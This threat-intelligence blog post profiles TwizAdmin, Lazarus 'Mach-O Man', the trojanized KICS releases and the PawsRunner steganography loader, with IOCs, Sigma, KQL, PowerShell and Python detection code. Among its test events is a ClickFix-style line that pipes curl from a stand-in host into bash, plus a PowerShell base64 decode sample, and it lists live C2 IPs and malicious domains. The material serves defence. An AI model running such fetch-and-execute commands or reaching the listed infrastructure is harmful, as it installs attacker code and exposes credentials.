
TwizAdmin, Lazarus Mach-O Man & Supply Chain Attacks: Cross-Platform Credential Theft

Security Arsenal Team
May 22, 2026
6 min read

Recent OTX pulses indicate a convergence of sophisticated credential theft operations spanning multiple operating systems and attack vectors. The DataBreachPlus group is actively deploying the TwizAdmin suite, a multi-stage malware operation combining cryptocurrency clipboard hijacking, BIP-39 seed phrase theft, and a ransomware module (crpx0) managed via a FastAPI C2 panel. Simultaneously, the Lazarus Group has accelerated campaigns targeting the finance and technology sectors with "Mach-O Man," a macOS malware kit distributed via ClickFix social engineering attacks impersonating collaboration software.

A critical supply chain compromise affecting Checkmarx KICS (attributed to TeamPCP) highlights the risk of credential theft via poisoned development tooling, where trojanized Docker images and VS Code extensions exfiltrate secrets. Additionally, the PureLogs infostealer is utilizing PawsRunner, a steganography loader, to conceal malicious payloads within image files to evade detection. While FrostyNeighbor continues cyberespionage activities in Eastern Europe using Cobalt Strike, the overarching theme across these pulses is the aggressive targeting of credentials, cryptocurrency assets, and infrastructure secrets.

Threat Actor / Malware Profile

TwizAdmin (DataBreachPlus)

  • Distribution: Multi-platform (Windows/macOS) via FedEx-themed lures and malicious downloads.
  • Payload Behavior: Modular malware featuring a crypto-clipper (8 blockchains), BIP-39 seed theft, browser credential exfiltration, and a ransomware module (crpx0).
  • C2 Communication: Managed via a FastAPI-based panel located at exposed IPs (e.g., 103.241.66[.]238:1337) requiring a license key.
  • Persistence: Maintains access through typical OS persistence mechanisms while awaiting C2 commands.

Mach-O Man (Lazarus Group)

  • Distribution: ClickFix attacks via fake meeting invitations on Telegram, redirecting to fraudulent collaboration platforms.
  • Payload Behavior: "Mach-O Man" malware kit; deploys PyLangGhostRAT for remote access and credential theft.
  • C2 Communication: Exfiltrates data via Telegram channels and custom C2 infrastructure.
  • Social Engineering: Triggers execution by convincing users to copy/paste terminal commands masquerading as software fixes.

TeamPCP (KICS Supply Chain)

  • Distribution: Poisoned Docker Hub images (tags v2.1.20, v2.1.21) and VS Code extensions (v1.17.0, v1.19.0).
  • Payload Behavior: Trojanized KICS binary (mcpAddon.js / Canister Worm) collects and encrypts scan reports containing credentials.
  • Objective: Long-term persistence in development environments to siphon infrastructure-as-code secrets.

PureLogs (PawsRunner)

  • Distribution: Phishing emails with TXZ archive attachments containing invoice-themed lures.
  • Payload Behavior: PawsRunner steganography loader extracts encrypted .NET infostealers from benign-looking PNG files.
  • Execution Chain: JavaScript -> PowerShell (decoding) -> PawsRunner (Stego extraction) -> PureLogs (Infostealer).
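
The chain above hides the PureLogs payload inside an image, but the pulse does not say where in the PNG it sits. The scanner below is an added example (not PawsRunner's or Fortinet's code): it walks the PNG chunk list, verifies each chunk CRC, and flags the two usual hiding places, bytes appended after the IEND chunk (a viewer stops reading there, so the file still renders) and a non-standard chunk type, reporting the Shannon entropy of anything it finds. The 1x1 sample image, the `prIv` chunk name and the sha256-derived blob standing in for an encrypted .NET payload are all constructed here.

```python
"""Added example (not PawsRunner's code): walk a PNG's chunk structure and
report the two places a steganography loader commonly parks an encrypted
payload: bytes appended after IEND, or a non-standard chunk. Where exactly
PawsRunner stores its payload is not stated in the pulse, so both are checked;
the private chunk name 'prIv' used for the sample is hypothetical."""
import hashlib
import math
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG specification; anything else is worth a look.
STANDARD_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"gAMA", b"cHRM", b"sRGB",
    b"iCCP", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"pHYs", b"sBIT", b"sPLT",
    b"hIST", b"tIME", b"eXIf",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted or compressed data sits close to 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def scan_png(data: bytes) -> dict:
    """Parse chunks, verify CRCs, flag trailing data and non-standard chunks."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, chunks, findings, trailing = len(PNG_SIG), [], [], b""
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length  # 4 length + 4 type + body + 4 CRC
        if end > len(data):
            findings.append(f"truncated chunk {ctype!r} at offset {pos}")
            break
        body = data[pos + 8:pos + 8 + length]
        (crc_stored,) = struct.unpack(">I", data[pos + 8 + length:end])
        crc_ok = (zlib.crc32(ctype + body) & 0xFFFFFFFF) == crc_stored
        ent = shannon_entropy(body)
        chunks.append({"type": ctype.decode("latin-1"), "length": length,
                       "crc_ok": crc_ok, "entropy": round(ent, 2)})
        if not crc_ok:
            findings.append(f"bad CRC on {ctype!r} chunk (most viewers render it anyway)")
        if ctype not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {ctype!r}, {length} bytes, entropy {ent:.2f}")
        pos = end
        if ctype == b"IEND":
            trailing = data[pos:]  # a decoder stops here; anything after is a free hiding spot
            break
    t_ent = shannon_entropy(trailing)
    if trailing:
        findings.append(f"{len(trailing)} bytes after IEND, entropy {t_ent:.2f}")
    nonstandard = any(c["type"].encode("latin-1") not in STANDARD_CHUNKS for c in chunks)
    return {"chunks": chunks, "trailing_length": len(trailing),
            "trailing_entropy": round(t_ent, 2), "findings": findings,
            "suspicious": bool(trailing) or nonstandard}


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_png(trailing: bytes = b"", private_chunk: bytes = b"") -> bytes:
    """Constructed 1x1 RGB PNG, optionally with appended data and/or a private chunk."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\x00\x00\x00")             # filter byte + one black pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
    if private_chunk:
        png += _chunk(b"prIv", private_chunk)  # hypothetical chunk name
    return png + _chunk(b"IEND", b"") + trailing


def fake_encrypted_blob(size: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy bytes standing in for an encrypted .NET payload."""
    out, block = b"", seed
    while len(out) < size:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:size]


if __name__ == "__main__":
    samples = [("clean", make_png()),
               ("appended", make_png(trailing=fake_encrypted_blob(4096))),
               ("private chunk", make_png(private_chunk=fake_encrypted_blob(2048)))]
    for label, sample in samples:
        result = scan_png(sample)
        print(f"{label}: suspicious={result['suspicious']} findings={result['findings']}")
```

Run it over the PNGs extracted from the TXZ attachments or any image referenced by a PowerShell decode event. A high-entropy tail or private chunk on a tiny image is the triage signal; a CRC failure means the chunk was written by something other than an ordinary image library.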

IOC Analysis

The provided intelligence contains a mix of network and file-based indicators:

  • Domains & URLs: Typosquatting domains (e.g., livemicrosft[.]com) and malware distribution sites (e.g., fanonlyatn[.]xyz). Block these at the DNS resolver and web proxy immediately, and retain the resolver and proxy logs: a blocked lookup still identifies the host that attempted it.
  • File Hashes: SHA256 and MD5 hashes for the droppers, loaders, and malicious binaries of TwizAdmin, Mach-O Man, and KICS.
  • IP Addresses: C2 IPs including 103.241.66[.]238 and 5.101.84[.]202.

Operational Guidance: SOC teams should prioritize the SHA256 hashes for EDR hunting. The KICS pulse also carries MD5 hashes; match on both algorithms when checking cached Docker image layers and extension bundles, because some artifact repositories and build caches still publish MD5 checksums only. Write Sigma or SIEM rules (not YARA, which scans files and memory rather than logs) for the fanonlyatn[.]xyz URL patterns in proxy and DNS logs.

Detection Engineering

```yaml
---
title: Potential TwizAdmin C2 Activity
id: 5c6b7a8d-9e1f-4a2c-8b3d-1e4f5a6b7c8d
description: Detects outbound connections to the TwizAdmin FastAPI C2 panel reported in the pulse (103.241.66.238, port 1337). Pin the IP rather than a port prefix; DestinationPort|startswith '133' would also fire on ports 133, 1330-1339 and 13300-13399.
status: experimental
author: Security Arsenal
date: 2026/05/23
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
    - attack.command_and_control
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationIp: '103.241.66.238'
        Initiated: 'true'
    condition: selection
falsepositives:
    - Unlikely
level: high
---
title: Steganography Loader Execution via PowerShell
id: 9d8e7f6a-5b4c-3d2e-1f0a-9b8c7d6e5f4a
description: Detects PowerShell command lines that combine decoding (FromBase64String or System.Drawing image handling) with a reference to a PNG or BMP file, as in the PowerShell stage of the PawsRunner chain that unpacks PureLogs from an image. Both terms are required; an OR over the whole list would fire on any script that merely touches a .png.
status: experimental
author: Security Arsenal
date: 2026/05/23
references:
    - https://www.fortinet.com/blog/threat-research/purelogs-delivery-via-pawsrunner-steganography
tags:
    - attack.defense_evasion
    - attack.execution
    - attack.t1027.003
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_decode:
        CommandLine|contains:
            - 'System.Drawing'
            - 'FromBase64String'
    selection_image:
        CommandLine|contains:
            - '.png'
            - '.bmp'
    condition: all of selection_*
falsepositives:
    - Legitimate image processing scripts that also decode base64 data
level: medium
---
title: Lazarus Group Mach-O Man Fake Meeting Lure
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects a macOS shell or osascript process that fetches remote content (curl/wget) in a command line referencing meeting or collaboration software, the pattern produced when a user pastes a ClickFix "fix" for a fake meeting client into Terminal.
status: experimental
author: Security Arsenal
date: 2026/05/23
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.execution
    - attack.t1204.004
logsource:
    category: process_creation
    product: macos
detection:
    selection_shell:
        Image|endswith:
            - '/bin/bash'
            - '/bin/zsh'
            - '/bin/sh'
            - '/usr/bin/osascript'
    selection_fetch:
        CommandLine|contains:
            - 'curl '
            - 'wget '
    selection_lure:
        CommandLine|contains:
            - 'meeting'
            - 'teams'
            - 'zoom'
    condition: all of selection_*
falsepositives:
    - Legitimate installation of collaboration tools via curl-driven install scripts
level: high
```
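
To see what the selections actually match, here is an added example (not from the post or from any Sigma project code): a minimal evaluator with the three rules transcribed into Python dicts, run over constructed process-creation and network events. It makes the Sigma semantics explicit: values listed under one field are OR'ed, separate selections are combined by the condition, and string matching is case-insensitive. That is why the PowerShell and macOS rules here keep the fetch/decode term and the lure/image term in separate selections rather than one list, which would fire on any curl or any .png. Hostnames in the samples use the reserved .invalid TLD.

```python
"""Added example, not from the original post or any Sigma tooling: a minimal
evaluator for the three Sigma rules, applied to constructed events. The rules
are transcribed into dicts (no PyYAML dependency); matching follows Sigma:
values under one modifier are OR'ed, fields within a selection are AND'ed,
selections are combined by the condition, matching is case-insensitive."""

RULE_PAWSRUNNER = {
    "selections": {
        "selection_img": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"]},
        "selection_decode": {"CommandLine|contains": ["System.Drawing", "FromBase64String"]},
        "selection_image": {"CommandLine|contains": [".png", ".bmp"]},
    },
    "condition": "selection_img and selection_decode and selection_image",
}

RULE_CLICKFIX = {
    "selections": {
        "selection_shell": {"Image|endswith": ["/bin/bash", "/bin/zsh", "/bin/sh", "/usr/bin/osascript"]},
        "selection_fetch": {"CommandLine|contains": ["curl ", "wget "]},
        "selection_lure": {"CommandLine|contains": ["meeting", "teams", "zoom"]},
    },
    "condition": "selection_shell and selection_fetch and selection_lure",
}

RULE_TWIZADMIN_C2 = {
    "selections": {"selection": {"DestinationIp": "103.241.66.238", "Initiated": "true"}},
    "condition": "selection",
}


def _match_field(event: dict, key: str, expected) -> bool:
    """One 'Field|modifier: value(s)' entry; a list of values is an OR."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    wanted = [str(v).lower() for v in (expected if isinstance(expected, list) else [expected])]
    if modifier == "endswith":
        return any(value.endswith(w) for w in wanted)
    if modifier == "contains":
        return any(w in value for w in wanted)
    if modifier == "":
        return value in wanted
    raise ValueError(f"unsupported modifier {modifier!r}")


def _match_selection(event: dict, selection: dict) -> bool:
    # Every field in a selection must match (AND).
    return all(_match_field(event, k, v) for k, v in selection.items())


def evaluate(rule: dict, event: dict) -> bool:
    """Condition grammar supported: identifiers joined by 'and' / 'or', 'or' binding loosest."""
    hits = {name: _match_selection(event, sel) for name, sel in rule["selections"].items()}
    return any(all(hits[t.strip()] for t in clause.split(" and "))
               for clause in rule["condition"].split(" or "))


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed events: (label, event, rule, expected verdict).
SAMPLES = [
    ("clickfix_paste", {"Image": "/bin/bash",
        "CommandLine": 'bash -c "curl -fsSL https://teams-meeting.invalid/fix.sh | bash"'}, RULE_CLICKFIX, True),
    ("brew_zoom_no_curl", {"Image": "/bin/bash", "CommandLine": "brew install --cask zoom"}, RULE_CLICKFIX, False),
    ("curl_no_lure", {"Image": "/bin/zsh", "CommandLine": "curl -O https://mirror.invalid/file.tar.gz"}, RULE_CLICKFIX, False),
    ("zoom_pkg_curl_fp", {"Image": "/bin/bash",   # the documented false positive
        "CommandLine": "curl -L https://zoom-client.invalid/Zoom.pkg -o Zoom.pkg"}, RULE_CLICKFIX, True),
    ("stego_decode_stage", {"Image": PS,
        "CommandLine": "powershell -ep bypass -c \"$b=[Convert]::FromBase64String($s);[IO.File]::WriteAllBytes('invoice.png',$b)\""},
        RULE_PAWSRUNNER, True),
    ("png_listing_only", {"Image": PS, "CommandLine": "powershell -c Get-ChildItem *.png"}, RULE_PAWSRUNNER, False),
    ("c2_connect", {"DestinationIp": "103.241.66.238", "DestinationPort": 1337, "Initiated": "true"}, RULE_TWIZADMIN_C2, True),
    ("port_133x_other_host", {"DestinationIp": "10.0.0.5", "DestinationPort": 13306, "Initiated": "true"}, RULE_TWIZADMIN_C2, False),
]


def evaluate_samples() -> dict:
    """Label -> (verdict, expected) for every constructed event."""
    return {label: (evaluate(rule, event), expected) for label, event, rule, expected in SAMPLES}


if __name__ == "__main__":
    for label, (got, expected) in evaluate_samples().items():
        print(f"{'OK ' if got == expected else 'BAD'} {label}: matched={got}")
```

The zoom_pkg_curl_fp event shows the rule's stated false positive: a hand-typed curl download of a collaboration client looks the same as the ClickFix paste, so tune on the parent process (Terminal launched by the user versus a browser-spawned shell) before raising the level further.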


```kql
// Hunt for TwizAdmin, PureLogs and KICS IOCs across network, process and file events
let IoC_Domains = dynamic(["fanonlyatn.xyz", "livemicrosft.com", "everycarebd.com"]);
let IoC_IPs = dynamic(["103.241.66.238", "5.101.84.202"]);
// Keep the algorithms apart: an MD5 in a SHA256 list can never match
let IoC_SHA256 = dynamic(["06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90"]);
let IoC_MD5 = dynamic(["d47de3772f2d61a043e7047431ef4cf4"]);
// Network connections: RemoteUrl carries the full URL, so match the domain as a term rather than exactly
DeviceNetworkEvents
| where RemoteUrl has_any (IoC_Domains) or RemoteIP in (IoC_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| union (
    // Executed binaries
    DeviceProcessEvents
    | where SHA256 in (IoC_SHA256) or MD5 in (IoC_MD5)
    | project Timestamp, DeviceName, FolderPath, SHA256, MD5, ProcessCommandLine
), (
    // Dropped or downloaded files that have not (yet) executed
    DeviceFileEvents
    | where SHA256 in (IoC_SHA256) or MD5 in (IoC_MD5)
    | project Timestamp, DeviceName, FolderPath, FileName, SHA256, MD5, ActionType
)
| sort by Timestamp desc
```


```powershell
# IOC Hunt Script for TwizAdmin & PureLogs Artifacts
# Run elevated so that every user profile and system path is readable.

# Keep SHA256 and MD5 indicators apart: Get-FileHash computes one algorithm
# per call, and an MD5 string will never equal a SHA256 string.
$Sha256ToCheck = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "0fcb86ae384e9975933314ac2a231f0ff46c0208556bf4a16f096a642d3f505e"
)
$Md5ToCheck = @(
    "d47de3772f2d61a043e7047431ef4cf4"
)

Write-Host "[+] Scanning for malicious file hashes..."
# -File skips directories (hashing one throws); the size filter skips empty files and large media.
# -contains compares case-insensitively, so the lowercase indicators match Get-FileHash's uppercase output.
# Hashing twice doubles read cost; drop the MD5 pass if you only hold SHA256 indicators.
Get-ChildItem -Path C:\ -File -Recurse -Force -ErrorAction SilentlyContinue |
Where-Object { $_.Length -gt 0 -and $_.Length -lt 50MB } |
ForEach-Object {
    $Sha256 = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
    if ($Sha256ToCheck -contains $Sha256) {
        Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) (SHA256: $Sha256)" -ForegroundColor Red
    }
    $Md5 = (Get-FileHash -LiteralPath $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
    if ($Md5ToCheck -contains $Md5) {
        Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) (MD5: $Md5)" -ForegroundColor Red
    }
}

# Check for established or pending TCP connections to known C2 IPs, with the owning process
$C2IPs = @("103.241.66.238", "5.101.84.202")
Write-Host "[+] Checking active network connections for C2 IPs..."
Get-NetTCPConnection -ErrorAction SilentlyContinue |
Where-Object { $C2IPs -contains $_.RemoteAddress } |
ForEach-Object {
    $Proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    Write-Host "[!] SUSPICIOUS CONNECTION: $($_.LocalAddress):$($_.LocalPort) -> $($_.RemoteAddress):$($_.RemotePort) state=$($_.State) pid=$($_.OwningProcess) ($($Proc.ProcessName))" -ForegroundColor Yellow
}

Write-Host "[+] Hunt complete."
```

Response Priorities

  • Immediate: Block all listed IOCs (domains fanonlyatn[.]xyz and livemicrosft[.]com, IPs 103.241.66[.]238 and 5.101.84[.]202) at perimeter firewalls and proxies. Initiate EDR scans for the provided SHA256 hashes.
  • 24h: Conduct a credential audit for users who may have interacted with the fake meeting invites (Lazarus) or downloaded the trojanized KICS tools. Rotate passwords and keys for every service account that appears in KICS scan reports produced by the affected versions, not only those confirmed exposed, since the trojanized binary collected the reports themselves.
  • 1 Week: Review and enforce supply chain security policies. Verify the integrity of all Docker images and VS Code extensions in the enterprise environment: pin images by digest and compare installed extension versions against the poisoned releases. On macOS endpoints, restrict who may run Terminal and osascript through MDM or EDR policy, and alert on shell command lines that pipe curl or wget output into a shell; no legitimate meeting client asks a user to paste commands into Terminal.
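
The KICS checks called for in the TeamPCP profile and in the one-week item above can be scripted. The following is an added example (not Checkmarx's or KICS's code): it fingerprints an installed VS Code extension directory, diffs it against a stored baseline so that a dropped or altered file surfaces even when the version string looks fine, and flags the Docker tags and extension versions the pulse lists. It assumes the official image repository is checkmarx/kics and that the extension is identified by "kics" in its package.json name; the extension folder name, the file contents and the mcpAddon.js drop in the simulated update are constructed for the demo.

```python
"""Added example (not Checkmarx's or KICS's code): baseline and diff an
installed VS Code extension directory, and flag the Docker tags and extension
versions the pulse reports as poisoned. Assumptions: the image repository is
checkmarx/kics; the extension's package.json name contains 'kics'."""
import hashlib
import json
import tempfile
from pathlib import Path

BAD_EXTENSION_VERSIONS = {"1.17.0", "1.19.0"}
BAD_DOCKER_TAGS = {"v2.1.20", "v2.1.21"}
KICS_IMAGE = "checkmarx/kics"  # assumption: repository name of the official image


def fingerprint_tree(root: Path) -> dict:
    """Relative path -> sha256 of content, for every regular file under root."""
    manifest = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        manifest[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifest(baseline: dict, current: dict) -> dict:
    """Files added, removed or changed since the baseline was recorded."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k])
    return {"added": added, "removed": removed, "modified": modified}


def check_extension(root: Path) -> list:
    """Flag a KICS extension whose package.json version is a poisoned release."""
    pkg = json.loads((root / "package.json").read_text())
    name, version = pkg.get("name", ""), pkg.get("version", "")
    issues = []
    if "kics" in name.lower() and version in BAD_EXTENSION_VERSIONS:
        issues.append(f"{name}@{version} is a trojanized release; remove it and reinstall a clean version")
    return issues


def check_docker_images(lines) -> list:
    """lines: output of `docker image ls --format '{{.Repository}}:{{.Tag}}'`."""
    hits = []
    for line in lines:
        repo, _, tag = line.strip().rpartition(":")  # rpartition keeps registry:port prefixes intact
        if repo == KICS_IMAGE and tag in BAD_DOCKER_TAGS:
            hits.append(line.strip())
    return hits


def demo() -> dict:
    """Constructed scenario: baseline a clean extension, then a trojanized update lands."""
    with tempfile.TemporaryDirectory() as tmp:
        ext = Path(tmp) / "publisher.kics-1.16.0"  # hypothetical extension folder name
        ext.mkdir()
        (ext / "package.json").write_text(json.dumps({"name": "kics", "version": "1.16.0"}))
        (ext / "extension.js").write_text("module.exports.activate = () => {};\n")
        baseline = fingerprint_tree(ext)
        # Simulated poisoned update: version bump, altered entry point, dropped add-on file
        (ext / "package.json").write_text(json.dumps({"name": "kics", "version": "1.19.0"}))
        (ext / "extension.js").write_text("module.exports.activate = () => require('./mcpAddon');\n")
        (ext / "mcpAddon.js").write_text("// constructed stand-in for the dropped component\n")
        return {
            "diff": diff_manifest(baseline, fingerprint_tree(ext)),
            "version_issues": check_extension(ext),
            "docker_hits": check_docker_images(
                ["checkmarx/kics:v2.1.19", "checkmarx/kics:v2.1.21", "python:3.12-slim"]),
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Record the baseline manifest at install time (or from a known-clean copy of the same version) and store it outside the extension directory; the diff is only as trustworthy as the place the baseline lives.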


Tags: darkweb, otx-pulse, darkweb-credentials, twizadmin, lazarus-group, supply-chain-attack, steganography, credential-theft
